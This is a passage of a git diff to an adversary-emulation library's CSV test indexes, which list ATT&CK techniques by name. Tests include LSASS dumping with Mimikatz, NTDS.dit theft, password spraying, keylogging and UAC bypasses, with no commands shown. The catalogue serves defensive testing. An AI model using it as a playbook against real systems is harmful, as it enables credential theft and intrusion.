exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
-credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
-credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
-credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
-credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
-credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
-credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
-credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
-credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
-credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 241e57a5..2bcc0b8f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -1,4 +1,66 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
+credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
+credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
+credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
+credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
+credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
+credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
+credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
+credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
+credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
+credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
+credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
+credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
+credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
+credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
+credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
+credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
+credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
+credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
+credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
+credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
+credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
+credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
+credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
+credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
+credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
+credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
+credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
+credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
+credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
+credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
+credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
+credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
+credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
+credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
+credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
+credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
+credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
+credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
+credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
+collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
+collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
+collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
+collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
+collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
+collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
+collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
+collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
+collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
+collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
+collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
+collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
+collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
+collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
+collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
+collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
+collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
+collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
+collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
+collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
@@ -7,14 +69,14 @@ privilege-escalation,T1546.011,Application Shimming,2,New shim database files cr
privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -34,7 +96,9 @@ privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn
privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
+privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
+privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
@@ -45,6 +109,7 @@ privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fe
privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
+privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -65,19 +130,21 @@ defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a1
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
-defense-evasion,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
-defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
-defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
-defense-evasion,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
+defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
+defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
+defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
+defense-evasion,T1070.003,Clear Command History,9,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
+defense-evasion,T1070.003,Clear Command History,10,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
@@ -184,7 +251,9 @@ defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf3
defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
+defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
+defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
@@ -215,6 +284,8 @@ defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer -
defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
@@ -280,6 +351,7 @@ persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db
persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
+persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -411,25 +483,6 @@ command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test o
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
-collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
-collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
-collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
-collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
-collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
-collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
-collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
-collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
-collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
-collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
-collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
-collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
-collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
-collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
-collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
-collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
-collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
-collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
-collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
@@ -463,10 +516,12 @@ execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86
execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
+execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
+execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
